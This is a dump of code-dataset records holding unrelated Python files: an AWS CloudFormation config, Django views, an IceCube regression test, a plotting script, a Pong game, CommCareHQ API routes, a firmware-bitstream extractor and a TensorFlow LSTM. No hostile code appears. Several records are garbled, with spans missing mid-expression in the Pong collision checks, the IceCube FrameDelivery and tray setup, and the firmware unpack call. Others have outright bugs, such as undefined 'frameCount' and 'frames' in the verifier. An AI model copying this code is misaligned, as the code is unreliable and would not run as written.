License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nfrom lib.cloudformation import CloudFormationConfiguration, Ref, Arn, get_scenario, Arg\nfrom lib.userdata import UserData\nfrom lib.names import AWSNames\nfrom lib import aws\nfrom lib import constants as const\nfrom lib import stepfunctions as sfn\n\nkeypair = None\n\n\ndef create_config(session, domain):\n \"\"\"Create the CloudFormationConfiguration object.\"\"\"\n config = CloudFormationConfiguration('activities', domain, const.REGION)\n names = AWSNames(domain)\n\n global keypair\n keypair = aws.keypair_lookup(session)\n\n vpc_id = config.find_vpc(session)\n sgs = aws.sg_lookup_all(session, vpc_id)\n internal_subnets, _ = config.find_all_availability_zones(session)\n internal_subnets_lambda, _ = config.find_all_availability_zones(session, lambda_compatible_only=True)\n topic_arn = aws.sns_topic_lookup(session, \"ProductionMicronsMailingList\")\n event_data = {\n \"lambda-name\": \"delete_lambda\",\n \"db\": names.endpoint_db,\n \"meta-db\": names.meta,\n \"s3-index-table\": names.s3_index,\n \"id-index-table\": names.id_index,\n \"id-count-table\": names.id_count_index,\n \"cuboid_bucket\": names.cuboid_bucket,\n \"delete_bucket\": names.delete_bucket,\n \"topic-arn\": topic_arn,\n \"query-deletes-sfn-name\": names.query_deletes,\n \"delete-sfn-name\": 
names.delete_cuboid,\n \"delete-exp-sfn-name\": names.delete_experiment,\n \"delete-coord-frame-sfn-name\": names.delete_coord_frame,\n \"delete-coll-sfn-name\": names.delete_collection\n }\n\n role_arn = aws.role_arn_lookup(session, \"events_for_delete_lambda\")\n multi_lambda = names.multi_lambda\n lambda_arn = aws.lambda_arn_lookup(session, multi_lambda)\n target_list = [{\n \"Arn\": lambda_arn,\n \"Id\": multi_lambda,\n \"Input\": json.dumps(event_data)\n }]\n schedule_expression = \"cron(1 6-11/1 ? * TUE-FRI *)\"\n #schedule_expression = \"cron(0/2 * * * ? *)\" # testing fire every two minutes\n\n config.add_event_rule(\"DeleteEventRule\", names.delete_event_rule, role_arn=role_arn,\n schedule_expression=schedule_expression, target_list=target_list, description=None)\n # Events have to be given permission to run lambda.\n config.add_lambda_permission('DeleteRulePerm', multi_lambda, principal='events.amazonaws.com',\n source=Arn('DeleteEventRule'))\n user_data = UserData()\n user_data[\"system\"][\"fqdn\"] = names.activities\n user_data[\"system\"][\"type\"] = \"activities\"\n user_data[\"aws\"][\"db\"] = names.endpoint_db\n user_data[\"aws\"][\"cache\"] = names.cache\n user_data[\"aws\"][\"cache-state\"] = names.cache_state\n user_data[\"aws\"][\"cache-db\"] = \"0\"\n user_data[\"aws\"][\"cache-state-db\"] = \"0\"\n user_data[\"aws\"][\"meta-db\"] = names.meta\n user_data[\"aws\"][\"cuboid_bucket\"] = names.cuboid_bucket\n user_data[\"aws\"][\"tile_bucket\"] = names.tile_bucket\n user_data[\"aws\"][\"ingest_bucket\"] = names.ingest_bucket\n user_data[\"aws\"][\"s3-index-table\"] = names.s3_index\n user_data[\"aws\"][\"tile-index-table\"] = names.tile_index\n user_data[\"aws\"][\"id-index-table\"] = names.id_index\n user_data[\"aws\"][\"id-count-table\"] = names.id_count_index\n\n config.add_autoscale_group(\"Activities\",\n names.activities,\n aws.ami_lookup(session, 'activities.boss'),\n keypair,\n subnets=internal_subnets_lambda,\n type_=const.ACTIVITIES_TYPE,\n security_groups=[sgs[names.internal]],\n user_data=str(user_data),\n role=aws.instance_profile_arn_lookup(session, \"activities\"),\n min=1,\n max=1)\n\n config.add_lambda(\"IngestLambda\",\n names.ingest_lambda,\n aws.role_arn_lookup(session, 'IngestQueueUpload'),\n const.INGEST_LAMBDA,\n handler=\"index.handler\",\n timeout=60 * 5)\n\n config.add_lambda_permission(\"IngestLambdaExecute\", Ref(\"IngestLambda\"))\n\n return config\n\n\ndef generate(session, domain):\n \"\"\"Create the configuration and save it to disk\"\"\"\n config = create_config(session, domain)\n config.generate()\n\n\ndef create(session, domain):\n \"\"\"Create the configuration, launch it, and initialize Vault\"\"\"\n config = create_config(session, domain)\n\n success = config.create(session)\n if success:\n post_init(session, domain)\n\n\ndef post_init(session, domain):\n names = AWSNames(domain)\n\n sfn.create(session, names.query_deletes, domain, 'query_for_deletes.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_cuboid, domain, 'delete_cuboid.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_experiment, domain, 'delete_experiment.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_coord_frame, domain, 'delete_coordinate_frame.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_collection, domain, 'delete_collection.hsd', 'StatesExecutionRole-us-east-1 ')\n #sfn.create(session, names.populate_upload_queue, domain, 'populate_upload_queue.hsd',\n # 
'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.ingest_queue_populate, domain, 'ingest_queue_populate.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.ingest_queue_upload, domain, 'ingest_queue_upload.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.resolution_hierarchy, domain, 'resolution_hierarchy.hsd', 'StatesExecutionRole-us-east-1')\n sfn.create(session, names.downsample_volume, domain, 'downsample_volume.hsd', 'StatesExecutionRole-us-east-1')\n\n\ndef delete(session, domain):\n names = AWSNames(domain)\n # DP TODO: delete activities\n CloudFormationConfiguration('activities', domain).delete(session)\n\n sfn.delete(session, names.delete_cuboid)\n sfn.delete(session, names.delete_experiment)\n sfn.delete(session, names.delete_coord_frame)\n sfn.delete(session, names.delete_collection)\n sfn.delete(session, names.query_deletes)\n sfn.delete(session, names.ingest_queue_populate)\n sfn.delete(session, names.ingest_queue_upload)\n sfn.delete(session, names.resolution_hierarchy)\n sfn.delete(session, names.downsample_volume)\n","sub_path":"cloud_formation/configs/activities.py","file_name":"activities.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192468791","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Help_for_addicts_links, Network_security_links, To_contact_us, Partners\nfrom .models import ContactInformation\nfrom django.core.validators import validate_email\n\n\ndef hello(request):\n kwargs = {}\n cont = [i for i in ContactInformation.objects.all() if i.flag]\n kwargs['phones'] = [i.phone for i in cont]\n kwargs['addicts'] = Help_for_addicts_links.objects.all()\n kwargs['security'] = Network_security_links.objects.all()\n kwargs['partners'] = Partners.objects.all()\n return render(request, 'MainPage/pomogut-page1.html', kwargs)\n\n\ndef add_the_information_about_us(request):\n try:\n validate_email(request.GET['email'])\n except:\n return HttpResponse('error')\n else:\n to = To_contact_us(email=request.GET['email'], text=request.GET['text'])\n to.save()\n return HttpResponse('done')\n# Create your views here.\n","sub_path":"MainPagePomogut/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"134086075","text":"#!/usr/bin/env python \n\n\"\"\"\nThis is really not a unit test but a regression test, ensuring that this project's splitter continues\nto produce exactly the same output as the original HiveSplitter. If any change is made to the\nalgorithm this test will fail, and if the change is intentional the test data will need to be regenerated\nto put this test back on track.\nThis script can also be used to generate the testcase itself by specifying the number of output FramePackets as second argument,\n i.e. 
$ ./i3hivecleaningTest.py 100\n\"\"\"\nfrom icecube import icetray, dataclasses\n\nclass I3HiveCleaningVerifier(icetray.I3PacketModule):\n \"\"\"An I3Module which compares that two different cleanings produce exactly the same results\"\"\"\n def __init__(self, context):\n super(I3HiveCleaningVerifier, self).__init__(context, icetray.I3Frame.DAQ)\n self.frameCount = 0\n self.orgName = \"org\"\n self.redoName = \"redo\"\n self.pulsesName = \"MaskedOfflinePulses\"\n self.AddParameter(\"OriginalName\", \"Name of the original sub-eventstream\", self.orgName)\n self.AddParameter(\"RedoName\", \"Name of the reprocessed sub-eventstream\", self.redoName)\n self.AddOutBox(\"OutBox\")\n def Configure(self):\n self.orgName = self.GetParameter(\"OriginalName\")\n self.redoName = self.GetParameter(\"RedoName\")\n def MarkAndPush(self, frame):\n frame.Put(\"DIFF\", icetray.I3Bool(True))\n self.PushFrame(frame)\n def Physics(self, frame):\n self.frameCount+=1\n \n #next, step through the split frames in parallel and make sure that the the split pulse series are identical\n #compare these objects:\n # - RecoPulseSeries\n\n orgMap = dataclasses.I3RecoPulseSeriesMap.from_frame(frame, self.orgName)\n redoMap = dataclasses.I3RecoPulseSeriesMap.from_frame(frame, self.redoName)\n \n #should be the same number of DOMs present in both maps\n if (len(orgMap) != len(redoMap)):\n icetray.logging.log_error(\"Regression: Different numbers of hit DOMs in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\":\\n\"\\\n +\" original= \"+str(len(orgMap))+\", current=\"+str(len(redoMap)))\n self.MarkAndPush(frames)\n return\n \n #iterate over all of the DOMs and ensure that the same DOMs are hit, and have the same pulses\n for k in range(len(orgMap)):\n #check that both pulse series are for the same DOM\n orgOMKey = orgMap.keys()[k]\n redoOMKey = redoMap.keys()[k]\n if (orgOMKey != redoOMKey):\n icetray.logging.log_error(\"Regression: Missmatched DOMs in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\":\\n\"\\\n +\" original= \"+str(orgOMKey)+\", current=\"+str(redoOMKey))\n self.MarkAndPush(frames)\n return\n #check that the DOM has the same number of pulses in both series\n orgPulses = orgMap.values()[k]\n redoPulses = redoMap.values()[k]\n if (len(orgPulses) != len(redoPulses)):\n icetray.logging.log_error(\"Regression: Different numbers of hits on DOM \"+str(orgOMKey)+\" in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\":\\n\"\\\n +\" original= \"+str(len(orgPulses))+\", current=\"+str(len(redoPulses)))\n self.MarkAndPush(frames)\n return\n \n #iterate over all of the pulses and check that they are the same\n for p in range(len(orgPulses)):\n orgPulse = orgPulses[p]\n redoPulse = redoPulses[p]\n if (len(orgPulses) != len(redoPulses)):\n icetray.logging.log_error(\"Regression: Different pulse \"+str(p)+\" on DOM \"+str(orgOMKey)+\" in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\"!\")\n self.MarkAndPush(frames)\n return\n self.PushFrame(frame)\n\nclass FrameDelivery(icetray.I3PacketModule):\n \"\"\"A module that just deliveres a specified number of packages\"\"\"\n def __init__(self, context):\n super(FrameDelivery, self).__init__(context, icetray.I3Frame.DAQ)\n self.AddParameter(\"NRequested\", \"Deliver that many frame-packets\", 100)\n self.AddOutBox(\"OutBox\")\n def Configure(self):\n self.nrequested = self.GetParameter(\"NRequested\")\n self.ndelivered = 0\n def FramePacket(self, frames):\n if (self.ndelivered\", redo_org,\n InputName = 
\"MaskedOfflinePulses\",\n OutputName = redo_org,\n Stream = icetray.I3Frame.Physics)\n \nif (test):\n tray.AddModule(I3HiveCleaningVerifier,\"CleaningVerifier\")\n\n tray.AddModule(icetray.I3TestModuleFactory(TestEqual), \"TestEqual\",\n Streams=[icetray.I3Frame.DAQ])\n\nif (not test):\n tray.AddModule(\"Delete\", \"del\",\n Keys = [\"MaskedOfflinePulses_Physics\",\n \"MaskedOfflinePulses_Noise\"])\n \n tray.AddModule(FrameDelivery, \"deliver\",\n NRequested = int(sys.argv[1]))\n \n tray.AddModule(\"I3Writer\", \"Writer\",\n Filename= os.path.join(os.path.expandvars(\"$I3_BUILD\"),\"IceHive/resources/hivecleaning_testcase.i3.bz2\"),\n Streams = [icetray.I3Frame.Geometry,\n #icetray.I3Frame.Calibration,\n #icetray.I3Frame.DetectorStatus,\n icetray.I3Frame.DAQ,\n icetray.I3Frame.Physics])\n\n\n\ntray.Execute()\n\n\n","sub_path":"IceHive/resources/test/i3hivecleaningTest.py","file_name":"i3hivecleaningTest.py","file_ext":"py","file_size_in_byte":7234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25352504","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 7 18:12:47 2020\r\n\r\n@author: olga\r\n\"\"\"\r\n\r\nimport pandas\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n# Max Temperature of Warmest Month (BIO5) \t2.98\r\n# Precipitation of Coldest Quarter (BIO19) 7.67\r\n# Min Temperature of Coldest Month (BIO6) 7.83\r\n# Temperature Seasonality (BIO4) 7.84\r\n\r\n# Precipitation Seasonality (BIO15)\t 38.81\r\n# Mean Temperature of Driest Quarter (BIO9) \t64.42\r\n# Mean Diurnal Range (BIO2) \t \t68.44\r\n# Precipitation of Driest Quarter (BIO17) \t71.19\r\n\r\n\r\ndf = pandas.DataFrame(dict(graph=['\\n \\n trivial \\n regressions', '\\n \\n regressions \\n with Bayesian \\n simulations'],\r\n n1=[2.98, 38.81], # or, bl\r\n n2=[7.67, 64.42], # bl, or\r\n n3=[7.83, 68.44], # or, viol\r\n n4=[7.84, 71.19],)) # viol, bl\r\nind = np.arange(len(df))\r\nwidth = 0.23\r\n\r\nfig, ax = plt.subplots()\r\nax.barh(ind, df.n1, width, color=[\"orange\", \"blue\"], label='N1')\r\nax.barh(ind + width, df.n2, width, color=[\"blue\", \"orange\"], label='N2')\r\nax.barh(ind + width + width, df.n3, width, color=[\"orange\", \"purple\"], label='N3')\r\nax.barh(ind + width + width + width, df.n4, width, color=[\"purple\", \"blue\"], label='N4')\r\n\r\n\r\nax.set(yticks=ind + width + width + width, yticklabels=df.graph, ylim=[4*width - 1, len(df)])\r\n# ax.legend()\r\nplt.show()\r\n","sub_path":"R_squareds_for_models_big_bar_plot.py","file_name":"R_squareds_for_models_big_bar_plot.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285691276","text":"\n\ndef lowerBound(a, sub, n, x):\n left = 0\n right = n\n pos = right\n while left < right:\n mid = left + (right - left) // 2\n index = sub[mid]\n if a[index] <= x:\n pos = mid\n right = mid\n else:\n left = mid + 1\n return pos\n\ndef LIS(a):\n global path\n length = 1\n path = [-1] * len(a)\n dp.append(0)\n for i in range(1, len(a)):\n if a[i] >= a[dp[0]]:\n dp[0] = i\n elif a[i] <= a[dp[length - 1]]:\n path[i] = dp[length - 1]\n dp.append(i)\n length += 1\n else:\n pos = lowerBound(a, dp, length, a[i])\n path[i] = dp[pos - 1]\n dp[pos] = i\n return length\n\na = []\nresults = []\nwhile(1):\n rocket_high = int(input())\n if(rocket_high == -1 and len(a)==0):\n break\n if(rocket_high!=-1):\n a.append(rocket_high)\n if(rocket_high == -1 and len(a)>0):\n dp = []\n sequence_len = 
LIS(a)\n results.append(sequence_len)\n a = []\n continue\nfor i, result in enumerate(results):\n print(\"Test #\"+str(i+1)+':')\n print(\" maximum possible interceptions: \"+str(result))\n","sub_path":"BigOOrange/DP_3/Testing the CATCHER.py","file_name":"Testing the CATCHER.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552083131","text":"import re #Import regex for case insenstive search\n\ncars = {\n 'Ford': ['Falcon', 'Focus', 'Festiva', 'Fairlane'],\n 'Holden': ['Commodore', 'Captiva', 'Barina', 'Trailblazer'],\n 'Nissan': ['Maxima', 'Pulsar', '350Z', 'Navara'],\n 'Honda': ['Civic', 'Accord', 'Odyssey', 'Jazz'],\n 'Jeep': ['Grand Cherokee', 'Cherokee', 'Trailhawk', 'Trackhawk']\n}\n\n\n# Testing things\n# for models in cars.values():\n# for model in models:\n# print(model)\n\ndef get_all_jeeps(cars=cars):\n \"\"\"return a comma + space (', ') separated string of jeep models (original order)\"\"\"\n carString = \"\"\n jeepList = cars['Jeep']\n for jeep in jeepList:\n carString+=jeep+\", \"\n return carString[:-2]\n\nprint(get_all_jeeps())\n\n# Testing\n# for models in cars.values():\n# print(models)\n\ndef get_first_model_each_manufacturer(cars=cars):\n \"\"\"return a list of matching models (original ordering)\"\"\"\n firstModels=[]\n for models in cars.values():\n firstModels.append(models[0])\n return firstModels\n\nprint(get_first_model_each_manufacturer())\n\ndef get_all_matching_models(cars=cars, grep='trail'):\n \"\"\"return a list of all models containing the case insensitive\n 'grep' string which defaults to 'trail' for this exercise,\n sort the resulting sequence alphabetically\"\"\"\n matchList = []\n for models in cars.values():\n for model in models:\n if re.search(grep,model,re.IGNORECASE):\n matchList.append(model)\n return matchList\n\nprint(get_all_matching_models())\nprint(get_all_matching_models(grep='CO'))\n\ndef sort_car_models(cars=cars):\n \"\"\"sort the car models (values) and return the resulting cars dict\"\"\"\n for models in cars.values():\n models.sort()\n return cars\n\n# print(sort_car_models())\n","sub_path":"days/07-09-data-structures/myBite21/myCode/Bite21.py","file_name":"Bite21.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225991098","text":"class Solution:\n def hasGroupsSizeX(self, deck):\n dic = collections.Counter(x for x in deck)\n occu = []\n\n for i in dic:\n occu.append(dic[i])\n\n occu = set(occu)\n min_value = min(occu)\n if min_value < 2:\n return False\n for i in occu:\n if self.gcd(i, min_value) == 1:\n return False\n return True\n\n def gcd(self, a, b):\n if a < b:\n a, b = b, a\n while b != 0:\n tmp = a% b\n a = b\n b = tmp\n return a\n","sub_path":"python/914 X of a Kind in a Deck of Cards.py","file_name":"914 X of a Kind in a Deck of Cards.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56833945","text":"import re\nfrom corehq.apps.api.object_fetch_api import CaseAttachmentAPI\n\nfrom corehq.apps.api.domainapi import DomainAPI\nfrom corehq.apps.api.redis_assets import RedisAssetsAPI\nfrom corehq.apps.api.resources import v0_1, v0_2, v0_3, v0_4, v0_5\nfrom corehq.apps.commtrack.resources.v0_1 import ProductResource,\\\n StockStatusResource, StockReportResource, FullStockTransactionResource\nfrom corehq.apps.fixtures.resources.v0_1 
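# --- Illustrative sketch (editor addition, not a dataset record) ---
# The hasGroupsSizeX solution above uses collections.Counter (the record
# itself would also need `import collections` at module scope) plus a
# hand-rolled gcd. The idiomatic form reduces math.gcd over the card counts:
import collections
import functools
import math

def has_groups_size_x(deck):
    counts = collections.Counter(deck).values()
    return functools.reduce(math.gcd, counts) >= 2

assert has_groups_size_x([1, 2, 3, 4, 4, 3, 2, 1]) is True
assert has_groups_size_x([1, 1, 1, 2, 2, 2, 3, 3]) is False
# --- end sketch ---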
import FixtureResource\nfrom corehq.apps.locations.resources.v0_1 import LocationResource\nfrom corehq.apps.reports.resources.v0_1 import ReportResource\nfrom django.conf.urls.defaults import *\nfrom django.http import HttpResponseNotFound\nfrom tastypie.api import Api\nfrom corehq.apps.api.es import XFormES\nfrom dimagi.utils.decorators import inline\n\nAPI_LIST = (\n ((0, 1), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_1.CommCareCaseResource,\n v0_1.XFormInstanceResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 2), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_2.CommCareCaseResource,\n v0_1.XFormInstanceResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 3), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_3.CommCareCaseResource,\n v0_3.XFormInstanceResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 4), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_4.ApplicationResource,\n v0_4.CommCareCaseResource,\n v0_4.GroupResource,\n v0_4.XFormInstanceResource,\n v0_4.RepeaterResource,\n v0_4.SingleSignOnResource,\n v0_4.HOPECaseResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 5), (\n v0_4.ApplicationResource,\n v0_4.CommCareCaseResource,\n v0_4.XFormInstanceResource,\n v0_4.RepeaterResource,\n v0_4.SingleSignOnResource,\n v0_4.HOPECaseResource,\n v0_5.CommCareUserResource,\n v0_5.WebUserResource,\n v0_5.GroupResource,\n v0_5.BulkUserResource,\n FixtureResource,\n ReportResource,\n )),\n)\n\n# eventually these will have to version too but this works for now\nCOMMTRACK_RESOURCES = (LocationResource, ProductResource, StockStatusResource,\n FullStockTransactionResource, StockReportResource)\n\nclass CommCareHqApi(Api):\n def top_level(self, request, api_name=None, **kwargs):\n return HttpResponseNotFound()\n\n @property\n def urls(self):\n \"\"\"\n Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.11/tastypie/api.py#L84\n (BSD-licensed) and hotfixed for https://github.com/toastdriven/django-tastypie/issues/816\n \"\"\"\n api_name_regex = re.escape(self.api_name)\n \n pattern_list = [\n url(r\"^(?P%s)%s$\" % (api_name_regex, trailing_slash()), self.wrap_view('top_level'), name=\"api_%s_top_level\" % self.api_name),\n ]\n \n for name in sorted(self._registry.keys()):\n self._registry[name].api_name = self.api_name\n pattern_list.append((r\"^(?P%s)/\" % api_name_regex, include(self._registry[name].urls)))\n \n urlpatterns = self.override_urls() + patterns('',\n *pattern_list\n )\n return urlpatterns\n \n\n@inline\ndef api_url_patterns():\n for version, resources in API_LIST:\n api = CommCareHqApi(api_name='v%d.%d' % version)\n for R in resources:\n api.register(R())\n for R in COMMTRACK_RESOURCES:\n api.register(R())\n yield (r'^', include(api.urls))\n yield url(r'^v0.1/xform_es/$', XFormES.as_domain_specific_view())\n # HACK: fix circular import here, to fix later\n try:\n from pact.api import PactAPI\n except ImportError:\n pass # maybe pact isn't installed\n for view_class in DomainAPI.__subclasses__():\n yield url(r'^custom/%s/v%s/$' % (view_class.api_name(), view_class.api_version()), view_class.as_view(), name=\"%s_%s\" % (view_class.api_name(), view_class.api_version()))\n yield url(r'^case/attachment/(?P[\\w\\-]+)/(?P.*)/(?P.*)$', CaseAttachmentAPI.as_view(), name=\"api_case_attachment\")\n yield url(r'^redis_assets/$', RedisAssetsAPI.as_view())\n\n\nurlpatterns = patterns('',\n 
*list(api_url_patterns))\n","sub_path":"corehq/apps/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30385808","text":"#!/usr/bin/env python2.7\nimport sys\nfrom random import randint\nimport pygame\nfrom pygame.locals import *\n\nfrom Ball import Ball\nfrom Player import Player\n\npygame.font.init()\n\nclass Pong:\n\n def __init__(self,window_size,nb_players=2):\n self.width,self.height = window_size\n self.nb_players = nb_players\n self.ball = Ball(10,(self.width/2,self.height/2)) \n # Fill background\n self.screen = pygame.display.set_mode((self.width, self.height))\n self.background = pygame.Surface(self.screen.get_size())\n self.background = self.background.convert()\n self.background.fill((0,0,0))\n self.coef_y = randint(-10,10)\n self.coef_x = -1#[-1,1][randint(0,1)]\n self.ball_tracked = True\n self.p1 = Player(1,'toto',self.height/6,self.height/2)\n self.p2 = Player(2,'titi',self.height/6,self.height/2)\n\n def draw(self):\n\n # Display ball\n ball_s = self.ball.gen_surface()\n ball_pos = (self.ball.x, self.ball.y)\n self.background.fill((0, 0, 0))\n self.background.blit(ball_s, ball_pos)\n \n # Display Player Walls\n wall_p1 = self.p1.gen_surface()\n self.background.blit(wall_p1, (0,self.p1.wall_y))\n\n wall_p2 = self.p2.gen_surface()\n self.background.blit(wall_p2, (self.width-10,self.p2.wall_y))\n\n # Blit everything to the screen\n self.screen.blit(self.background, (0,0))\n\n \n def movments_calcul(self):\n if self.ball.x > (self.width-10-(self.ball.d)):\n if self.ball.y>self.p1.wall_y and self.ball.yself.p1.wall_y and self.ball.y (self.height-2-self.ball.d/2):\n self.coef_y = self.coef_y * (-1)\n elif self.ball.y<3:\n self.coef_y = self.coef_y * (-1)\n \n self.ball.x = self.ball.x+self.coef_x\n self.ball.y = self.ball.y+self.coef_y\n\n def is_on_wall(self,pos):\n x,y = pos\n x = self.ball.x\n y = self.ball.y\n\n if self.nb_players == 2:\n if y<3 or y>self.height-3 :\n return True \n else : \n return False\n \n def draw_wall(self):\n if self.nb_players == 2:\n white = (255,255,255)\n pygame.draw.rect(self.screen,white,(0,0,self.width,2))\n pygame.draw.rect(self.screen,white,(0,self.height-2,self.width,self.height))\n\n def run(self):\n # Initialise screen\n pygame.init()\n pygame.display.set_caption('Pong')\n\n\n # Event loop\n while 1:\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n if event.type == KEYDOWN:\n if event.key == K_UP and self.p1.wall_y>self.p1.wall_long:\n self.p1.wall_y = self.p1.wall_y-self.p1.wall_long\n elif event.key == K_DOWN and self.p1.wall_y\n##\n## This program is free software; you can redistribute it and/or modify\n## it under the terms of the GNU General Public License as published by\n## the Free Software Foundation; either version 3 of the License, or\n## (at your option) any later version.\n##\n## This program is distributed in the hope that it will be useful,\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
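# --- Illustrative sketch (editor addition, not a dataset record) ---
# Several comparisons in the Pong code above were mangled during extraction
# (e.g. "self.ball.yself.p1.wall_y" has lost its operator and right-hand
# bound). The paddle test such code normally performs is sketched below;
# the attribute names mirror the record, but the exact bounds are assumptions:
def ball_hits_paddle(ball_y, ball_d, wall_y, wall_long):
    """True when the ball's vertical span overlaps the paddle's span."""
    return (wall_y <= ball_y <= wall_y + wall_long
            or wall_y <= ball_y + ball_d <= wall_y + wall_long)

# On a hit, the horizontal direction flips: coef_x = -coef_x
# --- end sketch ---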
See the\n## GNU General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with this program; if not, see .\n##\n\n\nimport sys\nimport os\nimport hashlib\nimport struct\n\n\n'''\nLA_MODEL_NAME => { \n SHA256 => {\n FW => ( start, size ),\n BIN => ( start, size )\n }\n }\n'''\nfw_offsets_dict = {\n \"LA1010\" : { \"e46c7a334b81769535bef396515fe2f1a5b2888f7a9963a5f34dfba8902b920f\" :\n { \"FW\" : ( 0x323F8, 0x1948 ), \"BIN\" : ( 0x13A58, 0x1E9A0 ) }\n }\n }\n\ndef createFileName(laname, ext, dirname, basename):\n result = laname + '.' + ext\n if result == basename:\n result = basename + '.' + ext\n return (os.path.join(dirname, result), result);\n\ndef main():\n if len(sys.argv) != 2:\n print('Usage: {} '.format(os.path.basename(sys.argv[0])))\n return -1\n filename = sys.argv[1]\n dirname = os.path.dirname(filename)\n base = os.path.basename(filename)\n laname = os.path.splitext(base)[0].upper()\n (hexfilepath, hexfilename) = createFileName(laname, 'hex', dirname, base)\n (fwfilepath, fwfilename) = createFileName(laname, 'fw', dirname, base)\n (binfilepath, binfilename) = createFileName(laname, 'bitstream', dirname, base)\n try:\n fw_offsets = fw_offsets_dict[laname];\n except KeyError:\n print('LA \\'{}\\' isn\\'t supported'.format(laname))\n return -1\n with open(filename, 'rb') as f:\n data = f.read()\n sha256 = hashlib.sha256(data).hexdigest().lower()\n try:\n fw_offsets = fw_offsets[sha256];\n except KeyError:\n print('This version of \\'{}\\' library isn\\'t supported. Wrong SHA256'.format(base))\n return -1\n out_bytes = data[fw_offsets[\"BIN\"][0] : fw_offsets[\"BIN\"][0] + fw_offsets[\"BIN\"][1]]\n with open(binfilepath, 'wb') as f:\n f.write(out_bytes)\n print('Spartan bitstream saved to {}'.format(binfilepath))\n out_bytes = data[fw_offsets[\"FW\"][0] : fw_offsets[\"FW\"][0] + fw_offsets[\"FW\"][1]]\n idx = 0\n fw_out_data = bytearray()\n for i in range(0x4000):\n fw_out_data.append(0)\n with open(hexfilepath, 'w') as f:\n while idx < fw_offsets[\"FW\"][1]:\n check_sum = (out_bytes[idx] + out_bytes[idx + 1] + out_bytes[idx + 2]) & 0xFF\n (addr, size) = struct.unpack(\" (batch, n_steps, cell_size)\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size], name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.nn.rnn_cell.LSTMCell(self.cell_size, forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size, dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(\n lstm_cell, self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n # shape = (batch * steps, cell_size)\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name='2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size, ])\n # shape = (batch * steps, output_size)\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example(\n [tf.reshape(self.pred, [-1], name='reshape_pred')],\n [tf.reshape(self.ys, [-1], name='reshape_target')],\n [tf.ones([self.batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True,\n softmax_loss_function=self.ms_error,\n name='losses'\n )\n with tf.name_scope('average_cost'):\n self.cost = tf.div(\n tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size,\n 
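# --- Illustrative sketch (editor addition, not a dataset record) ---
# The extractor above walks firmware records with struct.unpack; its format
# string was partially lost in extraction, but unpacking a little-endian pair
# of 16-bit fields works like this ('<HH' is an assumption about the layout):
import struct

record = bytes([0x10, 0x00, 0x00, 0x30])   # 0x0010 then 0x3000, little-endian
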